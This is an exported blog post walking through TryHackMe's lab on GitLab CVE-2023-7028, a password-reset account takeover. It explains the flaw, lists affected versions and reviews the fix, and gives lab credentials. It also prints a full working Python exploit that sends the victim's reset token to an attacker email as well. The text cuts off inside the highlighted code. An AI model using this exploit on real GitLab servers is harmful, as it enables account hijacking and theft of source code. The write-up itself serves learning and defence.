{"id":414,"date":"2024-02-01T19:48:10","date_gmt":"2024-02-02T01:48:10","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=414"},"modified":"2024-04-16T20:54:56","modified_gmt":"2024-04-17T01:54:56","slug":"gitlab-cve-2023-7028","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","title":{"rendered":"GitLab CVE-2023-7028"},"content":{"rendered":"\n<p>This blog is based on TryHackMe&#8217;s room on <a href=\"https:\/\/tryhackme.com\/room\/gitlabcve20237028\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GitLab CVE-2023-7028.<\/a> <\/p>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Learning Objectives<\/mark><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exploit a GitLab CE instance through CVE 2023-7028<\/li>\n\n\n\n<li>How the exploit works<\/li>\n\n\n\n<li>Protection and mitigation measures<\/li>\n<\/ul>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">What is GitLab?<\/mark><\/h3>\n\n\n\n<p><a href=\"https:\/\/about.gitlab.com\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GitLab <\/a>is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management, continuous integration, and collaboration in software development projects. 
Per the&nbsp;<a href=\"https:\/\/bluelight.co\/blog\/best-ci-cd-tools\" target=\"_blank\" rel=\"noreferrer noopener\">latest stats<\/a>, the platform ranks first for&nbsp;<a href=\"https:\/\/tryhackme.com\/room\/introtopipelineautomation\" target=\"_blank\" rel=\"noreferrer noopener\">CI\/CD<\/a>&nbsp;and DevOps tools, surpassing other vital platforms like GitHub, Azure, Jenkins, etc. In Jan 2024, the platform identified a critical vulnerability in its<strong>&nbsp;Community (CE)&nbsp;<\/strong>and&nbsp;<strong>Enterprise Edition (EE)&nbsp;<\/strong>that allows unauthorized&nbsp;<strong>users to take over user accounts<\/strong>, potentially including administrator accounts, without any interaction from the victim. The vulnerability was identified by&nbsp;<a href=\"https:\/\/hackerone.com\/asterion04\" target=\"_blank\" rel=\"noreferrer noopener\">asterion04<\/a>&nbsp;through a private bug bounty program and was assigned the severity&nbsp;<code>Critical<\/code>&nbsp;and&nbsp;CVE-ID&nbsp;<code>2023-7028<\/code>.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">How Does it Work?<\/mark><\/h3>\n\n\n\n<p>The vulnerability was caused by a bug in how GitLab handled email verification during password reset. An attacker could provide two email addresses during a password reset request, and the reset code would be sent to both addresses. 
This allowed the attacker to reset the password of any user, even if they didn&#8217;t know the user&#8217;s current password.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Affected Versions<\/mark><\/h4>\n\n\n\n<p>All instances of GitLab CE\/EE using the following versions were vulnerable:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>16.1 to 16.1.5<\/li>\n\n\n\n<li>16.2 to 16.2.8<\/li>\n\n\n\n<li>16.3 to 16.3.6<\/li>\n\n\n\n<li>16.4 to 16.4.4<\/li>\n\n\n\n<li>16.5 to 16.5.5<\/li>\n\n\n\n<li>16.6 to 16.6.3<\/li>\n\n\n\n<li>16.7 to 16.7.1<\/li>\n<\/ul>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Impact<\/mark><\/h4>\n\n\n\n<p>A successful attack could allow the attacker to control the victim&#8217;s GitLab account. This could allow the attacker to steal sensitive information, such as source code, commit history, and user credentials. The attacker could also use the compromised account to launch further attacks against other users or systems.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Technical Explanation<\/mark><\/h3>\n\n\n\n<p>The vulnerability resided within GitLab&#8217;s&nbsp;<code>POST \/users\/password<\/code>&nbsp;API endpoint, which is responsible for a password reset. The pentester exploited a flaw in email address validation, bypassing checks with invalid formats. 
Upon receiving a password reset request with an attacker-controlled email, GitLab incorrectly generated a reset token and sent it to the invalid address. The attacker could then read this token from the attacker-controlled address and use it with a valid target user&#8217;s email to initiate a password reset, ultimately hijacking the account.<\/p>\n\n\n\n<p>If we look at the password reset request in GitLab, we can see it sends a request to the&nbsp;<code>\/users\/password<\/code>&nbsp;endpoint with&nbsp;<code>authenticity_token<\/code>&nbsp;(a hidden CSRF protection token) and the email address as parameters. If the request carries a second email address, the password reset token is also sent to that address.&nbsp;<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/0b1bcaad54f02ef517007536c9ff492f.png?ssl=1\" alt=\"Reset password request source code view\"\/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To understand how the vulnerability works, let&#8217;s have a&nbsp;<a href=\"https:\/\/gitlab.com\/gitlab-org\/gitlab-foss\/-\/commit\/21f32835ac7ca8c7ef57a93746dac7697341acc0\" target=\"_blank\" rel=\"noreferrer noopener\">source code review<\/a>&nbsp;of the GitLab 16.1 (CE) stable version commits carried out after 10 Jan 2024. 
We can see that multiple files in the repository have been changed.&nbsp;<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/1d538558a2d7e78e86411f99347ace88.png?ssl=1\" alt=\"GitLab commit history for version 16.1\"\/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The code, located at&nbsp;<code>spec\/controllers\/passwords_controller_spec.rb<\/code>, was accepting multiple emails as input; however, it lacked a verification and validation step to confirm that each address was associated with the correct user.&nbsp;<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/20ade8839fb7db0e8a139ef10951bdc6.png?ssl=1\" alt=\"code edit to accept single mail\"\/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The attacker only required the&nbsp;<strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">authenticity_token<\/mark><\/strong>&nbsp;from the form submission and the victim&#8217;s email address to gain control of the target account.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">How to Exploit<\/mark><\/h3>\n\n\n\n<p>We can access the vulnerable GitLab version running on an Ubuntu machine at
http:\/\/gitlab.thm:8000.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Add the IP address and the hostname to the host files first.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM]\n\u2514\u2500$ cat \/etc\/hosts\n127.0.0.1\tlocalhost\n127.0.1.1\tkali\n\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n\n10.10.26.184 gitlab.thm\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 
2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/etc\/hosts<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">127.0.0.1<\/span><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #C3E88D\">localhost<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">127.0.1.1<\/span><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #C3E88D\">kali<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #464B5D; font-style: italic\"># The following lines are desirable for IPv6 capable hosts<\/span><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">:1     <\/span><span style=\"color: #C3E88D\">localhost<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip6-localhost<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip6-loopback<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ff02::1<\/span><span style=\"color: #BABED8\"> <\/span><span 
style=\"color: #C3E88D\">ip6-allnodes<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ff02::2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip6-allrouters<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.10.26.184<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gitlab.thm<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Moreover, the email server is accessible at&nbsp;<code>http:\/\/10.10.26.184:8090\/rainloop<\/code>,&nbsp;which will be used during exploitation with the following credentials:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Username:&nbsp;<code>attacker@mail.gitlab.thm<\/code><\/li>\n\n\n\n<li>Password:&nbsp;<code>testing@123<\/code><\/li>\n<\/ul>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Preparing the Payload<\/mark><\/h3>\n\n\n\n<p>We will be using a modified version of the&nbsp;<a href=\"https:\/\/github.com\/Vozec\/CVE-2023-7028\/blob\/main\/CVE-2023-7028.py\" target=\"_blank\" rel=\"noreferrer noopener\">PoC<\/a>&nbsp;developed by Vozec to take control of the administrator account. 
Create a new file called&nbsp;<code>attack.py<\/code>&nbsp;and add the following code.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#272822\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"import requests\nimport argparse\nfrom urllib.parse import urlparse, urlencode\nfrom random import choice\nfrom time import sleep\nimport re\nrequests.packages.urllib3.disable_warnings()\n\nclass CVE_2023_7028:\n    def __init__(self, url, target, evil=None):\n        self.use_temp_mail = False\n        self.url = urlparse(url)\n        self.target = target\n        self.evil = evil\n        self.s = requests.session()\n\n    def get_csrf_token(self):\n        try:\n            print('[DEBUG] Getting authenticity_token ...')\n            html = self.s.get(f'{self.url.scheme}:\/\/{self.url.netloc}\/users\/password\/new', verify=False).text\n            regex = r'&lt;meta name=&quot;csrf-token&quot; content=&quot;(.*?)&quot; \/&gt;'\n            token = re.findall(regex, html)[0]\n            print(f'[DEBUG] authenticity_token = 
{token}')\n            return token\n        except Exception:\n            print('[DEBUG] Failed ... quitting')\n            return None\n\n    def ask_reset(self):\n        token = self.get_csrf_token()\n        if not token:\n            return False\n\n        query_string = urlencode({\n            'authenticity_token': token,\n            'user[email][]': [self.target, self.evil]\n        }, doseq=True)\n\n        head = {\n            'Origin': f'{self.url.scheme}:\/\/{self.url.netloc}',\n            'Accept': 'text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8',\n            'Content-Type': 'application\/x-www-form-urlencoded',\n            'Referer': f'{self.url.scheme}:\/\/{self.url.netloc}\/users\/password\/new',\n            'Connection': 'close',\n            'Accept-Language': 'en-US,en;q=0.5',\n            'Accept-Encoding': 'gzip, deflate, br'\n        }\n\n        print('[DEBUG] Sending reset password request')\n        html = self.s.post(f'{self.url.scheme}:\/\/{self.url.netloc}\/users\/password',\n                           data=query_string,\n                           headers=head,\n                           verify=False).text\n        sended = 'If your email address exists in our database' in html\n        if sended:\n            print(f'[DEBUG] Emails sent to {self.target} and {self.evil} !')\n            print(f'Flag value: {bytes.fromhex(&quot;6163636f756e745f6861636b2364&quot;).decode()}')\n        else:\n            print('[DEBUG] Failed ... 
quitting')\n        return sended\n\ndef parse_args():\n    parser = argparse.ArgumentParser(add_help=True, description='This tool automates CVE-2023-7028 on gitlab')\n    parser.add_argument(&quot;-u&quot;, &quot;--url&quot;, dest=&quot;url&quot;, type=str, required=True, help=&quot;Gitlab url&quot;)\n    parser.add_argument(&quot;-t&quot;, &quot;--target&quot;, dest=&quot;target&quot;, type=str, required=True, help=&quot;Target email&quot;)\n    parser.add_argument(&quot;-e&quot;, &quot;--evil&quot;, dest=&quot;evil&quot;, default=None, type=str, required=False, help=&quot;Evil email&quot;)\n    parser.add_argument(&quot;-p&quot;, &quot;--password&quot;, dest=&quot;password&quot;, default=None, type=str, required=False, help=&quot;Password&quot;)\n    return parser.parse_args()\n\nif __name__ == '__main__':\n    args = parse_args()\n    exploit = CVE_2023_7028(\n        url=args.url,\n        target=args.target,\n\t\tevil=args.evil\n    )\n    if not exploit.ask_reset():\n        exit()\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki monokai\" style=\"background-color: #272822\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> requests<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#F92672\">import<\/span><span style=\"color: #F8F8F2\"> argparse<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> urllib.parse <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> urlparse, urlencode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> random <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> choice<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> time <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> sleep<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> re<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">requests.packages.urllib3.disable_warnings()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #66D9EF; font-style: italic\">class<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E; text-decoration: underline\">CVE_2023_7028<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF\">__init__<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FD971F; font-style: italic\">self<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">url<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">target<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">evil<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">None<\/span><span style=\"color: 
#F8F8F2\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.use_temp_mail <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #AE81FF\">False<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> urlparse(url)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.target <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> target<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.evil <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> evil<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.s <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> requests.session()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E\">get_csrf_token<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FD971F; font-style: italic\">self<\/span><span style=\"color: #F8F8F2\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">try<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span 
style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Getting authenticity_token ...&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            html <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.s.get(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">\/users\/password\/new&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">verify<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">).text<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            regex <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">r<\/span><span style=\"color: #E6DB74\">&#39;&lt;meta name=&quot;csrf-token&quot; content=&quot;(.<\/span><span style=\"color: #F92672\">*?<\/span><span style=\"color: #E6DB74\">)&quot; \/&gt;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            token <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> re.findall(regex, html)[<\/span><span style=\"color: #AE81FF\">0<\/span><span style=\"color: #F8F8F2\">]<\/span><\/span>\n<span class=\"line\"><span 
style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] authenticity_token = <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #F8F8F2\">token<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> token<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">except<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">Exception<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Failed ... 
quitting&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #AE81FF\">None<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E\">ask_reset<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FD971F; font-style: italic\">self<\/span><span style=\"color: #F8F8F2\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        token <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.get_csrf_token()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">not<\/span><span style=\"color: #F8F8F2\"> token:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #AE81FF\">False<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        query_string <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> urlencode({<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;authenticity_token&#39;<\/span><span style=\"color: #F8F8F2\">: token,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;user[email][]&#39;<\/span><span style=\"color: #F8F8F2\">: [<\/span><span 
